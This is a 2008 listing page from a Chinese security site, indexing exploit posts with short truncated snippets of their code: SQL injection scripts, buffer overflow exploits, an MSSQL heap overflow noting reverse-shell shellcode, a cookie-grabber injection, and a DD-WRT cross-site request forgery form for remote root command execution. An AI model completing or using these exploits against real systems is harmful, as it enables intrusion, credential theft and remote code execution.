首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
热门关键字: shell  88888  art  vitter  linux
  当前位置:主页>安全文章>文章资料>Exploits>列表
Phoenician Casino FlashAX ActiveX Remote Code Execution Exploit
  日期:2008-12-18 10:57:11 点击:63 评论:0
####################### Phoenician Casino FlashAX ActiveX Remote Code Execution FTW! ######### ######By: e.wiZz! ######Blog: kidnap't by government .ba ######Business mail :) ew1zz@hotmail.com ######Info: you can erase my blog,arrest me,do whatever..
PHP python extension safe_mode Bypass Local Vulnerability
  日期:2008-12-18 10:56:45 点击:68 评论:0
?php /* php_python_bypass.php php python extension safe_mode bypass Amir Salmani - amir[at]salmani[dot]ir */ //python ext. installed? if (!extension_loaded('python')) die(python extension is not installedn); //eval python code $res = python_eval(' i
Microsoft SQL Server sp_replwritetovarbin() Heap Overflow Exploit (0day)
  日期:2008-12-18 10:55:36 点击:59 评论:0
html % // k`sOSe 12/17/2008 // Microsoft SQL Server sp_replwritetovarbin() Heap Overflow // Tested on Win2k SP4 with MSSQL 2000(on one box only!). // Shellcode is a slightly modified metasploit reverse shell(on 10.10.10.1 port 4445), // the change al
Realtek Sound Manager (rtlrack.exe v. 1.15.0.0) PlayList BOF Exploit
  日期:2008-12-17 10:52:50 点击:77 评论:0
#usage: exploit.py print -------------------------------------------------------------------------- print Realtek Sound Manager (rtlrack.exe v. 1.15.0.0) PlayList Buffer Overflown print url: http://www.realtek.com.tw/n print download: ftp://152.104
Aiyoota! CMS - Blind SQL Injection Exploit
  日期:2008-12-16 18:03:25 点击:38 评论:0
?php ini_set(max_execution_time,0); ini_set('user_agent', 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.9) Gecko/20071025 Firefox/2.0.0.9'); print_r(' ############################################################### # # Aiyoota! CMS - Blin
FLDS 1.2a report.php (linkida) Remote SQL Injection Exploit
  日期:2008-12-16 18:02:44 点击:24 评论:0
#!/usr/bin/perl -w # # Free Links Directory Script V1.2a Remote SQL Injection Exploit # written by ka0x ka0x01[alt+64]gmail.com # D.O.M Labs Security Researchers # - www.domlabs.org - # # Vuln code (report.php): # # if($_COOKIE['logged']==) { # [...]
MS Internet Explorer XML Parsing Buffer Overflow Exploit (allinone)
  日期:2008-12-16 10:30:17 点击:42 评论:0
!-- IE XML Heap Corruption exploit by krafty greets to hdm, ddz, SK, muts, halvar, grugq, and all the ethnical hackers sux to exploit traders - ZDI, WabiSabiLabi, and all you h0arders. Bring back the days of technotronic and r00tshell! Freedom. poc:
Mediatheka <= 4.2 Remote Blind SQL Injection Exploit
  日期:2008-12-16 10:28:21 点击:42 评论:0
#!/usr/bin/perl -w# Mediatheka = 4.2 Remote Blind SQL Injection Exploit# by athos - staker[at]hotmail[dot]ituse strict;use LWP::UserAgent;my ($stop,$start,$hash);my $domain = shift;my $userid = shift or usage;my @chars = (48..57, 97..102); my $subst
eZ Publish < 3.9.5/3.10.1/4.0.1 (token) Privilege Escalation Exploit
  日期:2008-12-16 10:27:41 点击:51 评论:0
?php /* eZ Publish privilege escalation and weak activation token for new user exploit by s4avrd0w [s4avrd0w@p0c.ru] Versions affected = 3.5.6 eZ Publish privilege escalation resolved in 3.9.5, 3.10.1, 4.0.1 More info: http://ez.no/developer/securit
Amaya Web Browser 10.0.1/10.1-pre5 (html tag) Buffer Overflow PoC
  日期:2008-12-16 10:26:28 点击:41 评论:0
Amaya Web Browser html tag overflow (quite a few tags are vulnerable) (gdb) i r eax 0x41414141 1094795585 ecx 0x0 0 edx 0xbfc0ff80 -1077870720 ebx 0x9ec1220 166466080 esp 0xbfc10064 0xbfc10064 ebp 0xbfc10268 0xbfc10268 esi 0xa2f64a0 170878112 edi 0x
Flatnux html/javascript Injection Cookie Grabber Exploit
  日期:2008-12-15 13:25:19 点击:28 评论:0
!-- exploit flatnux grabber cookies visitor site :http://www.speleoalex.altervista.org/flatnuke3/index.php download:http://www.speleoalex.altervista.org/flatnuke3/index.php?mod=06_Download author:gmda Flatnux does not filter code html/javascript then
EvansFTP (EvansFTP.ocx) Remote Buffer Overflow PoC
  日期:2008-12-15 13:23:38 点击:34 评论:0
HTML packagejob id='DoneInVBS' debug='false' error='true' object classid='clsid:7E864D3E-3E6A-48F0-88AF-CEAEE322F9FD' id='beard' / HEAD TITLEEvansFTP (EvansFTP.ocx) Remote Buffer Overflow PoC/TITLE /HEAD BODY [+] Application : EvansFTP ActiveX br [+]
Linux Kernel 2.6.27.7-generic - 2.6.18 - 2.6.24-1 Local DoS Exploit
  日期:2008-12-15 13:21:52 点击:28 评论:0
/* Linux Kernel 2.6.27.7-generic - 2.6.18 - 2.6.24-1 Dos Exploit ariginal id : Jon Oberheide http://www.milw0rm.com/exploits/7405 tested : 2.6.27.7-generic - 2.6.18 - 2.6.24-1 by : ADU-T patching : http://marc.info/?l=linux-netdevm=122841256115780w=
WebPhotoPro exploit written in python that leverages multiple SQL injection vuln
  日期:2008-12-15 10:38:51 点击:55 评论:0
#!/usr/bin/python# This was written for educational purpose only. Use it at your own risk.# Author will be not responsible for any damage!# !!! Special greetz for my friend sinner_01 !!!# !!! Special thanx for d3hydr8 and rsauron who inspired me !!!
ProSysInfo TFTP Server TFTPDWIN versions 0.4.2 and below universal remote buffer
  日期:2008-12-15 10:38:11 点击:41 评论:0
#!/usr/bin/perl## ProSysInfo TFTP server TFTPDWIN = 0.4.2# Universal Remote Buffer Overflow Exploit# [Works on all Windows versions.]# ----------------------------------------# Exploit by SkD (skdrat@hotmail.com)## Let's take a description from thei
Wysi Wiki Wyg 1.0 Remote Password Retrieve Exploit
  日期:2008-12-13 10:50:57 点击:29 评论:0
#!/bin/bash # Wysi Wiki Wyg 1.0 Remote Password Retrieve Exploit # by athos - staker[at]hotmail[dot]it host=$1; name=$2; path='/config/passwd.txt'; if [ $name = ]; then echo Usage: bash $0 [host/path] [filename]; echo by athos - staker[at]hotmail[do
MS Visual Basic ActiveX Controls mscomct2.ocx Buffer Overflow PoC
  日期:2008-12-13 10:49:43 点击:71 评论:0
#!/usr/bin/perl # Microsoft Visual Basic ActiveX Controls mscomct2.ocx Animation Object Buffer Overflow (CVE-2008-4255) PoC # You'll need Debugging Tools for Windows http://www.microsoft.com/whdc/devtools/debugging/default.mspx # /JA # Come to FRHAC
Internet Explorer 8.0 Beta 2 Anti-XSS Filter Vulnerabilities
  日期:2008-12-12 10:31:16 点击:71 评论:0
Aspect9: Internet Explorer 8.0 Beta 2 Anti-XSS Filter VulnerabilitiesRelease Date:December 11, 2008Date Reported:October 5, 2008Severity:Medium-High (Execute scripts, Turning Protection Off, Transfer data CrossDomains)Vendor:MicrosoftSystems Affecte
eZ Publish 3.9.0/3.9.5/3.10.1 Command Execution Exploit (admin req)
  日期:2008-12-12 10:28:30 点击:160 评论:0
// eZPublish_abuse_of_functionality_zero_day.php -------------------------------------------------------------- ?php /* eZ Publish OS Commanding executing exploit by s4avrd0w [s4avrd0w@p0c.ru] Versions affected 3.x * tested on version 3.9.0, 3.9.5,
Exploits Multiple XSRF in DD-WRT
  日期:2008-12-11 10:28:41 点击:58 评论:0
html head meta http-equiv=content-type content=text/html; charset=ISO-8859-1 /head Remote root command execution /bin/sh form method=post action=http://192.168.1.1/apply.cgi id=1 input name=submit_button value=Ping type=hidden input name=action value
共637页/12733条记录 首页 上一页 [492] [493] [494] 495 [496] [497] [498] 下一页 末页
  本月热点文章
 
  本月推荐文章
 
  相关分类
  漏洞检测
  漏洞资料
  入侵实例
  系统安全
  网络安全
  网络基础
  病毒分析
Exploits
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved